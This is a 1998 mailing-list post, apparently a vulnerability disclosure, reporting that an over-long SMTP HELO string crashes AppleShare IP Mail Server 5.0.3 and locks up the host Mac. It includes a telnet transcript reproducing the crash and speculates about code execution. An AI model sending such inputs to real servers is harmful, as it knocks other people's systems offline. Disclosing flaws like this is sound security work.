Date:         Wed, 8 Apr 1998 13:11:17 +1200
From:         Chris Wedgwood <chris@CYBERNET.CO.NZ>
Subject:      AppleShare IP Mail Server

[Yet another buffer overrun? - I hope this isn't getting monotonous]

I noticed this a while back but haven't seen any else mention it.


There appears to be what looks like a buffer overrun problem with AppleShare
IP Mail Server.

If you connect to the SMTP port and issue a long string (say 500 bytes or
so) the server crashes - and because its a Mac, it usually crashed the whole
machine to the point where it needs a reboot.

So far I've only tested against servers which emit the banner 'AppleShare IP
Mail Server 5.0.3'

For example:


$ telnet some.where
Trying 1.2.3.4...
Connected to some.where.
Escape character is '^]'.
220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
[ and it just hangs ]

$ ping some.where
[ ...nothing... ]


Physically checking the machine shows it has `locked up' and it a reboot. I
assume if you can cause a crash without the lockup then you might be able to
execute code and so something useful (on a Mac?).




-cw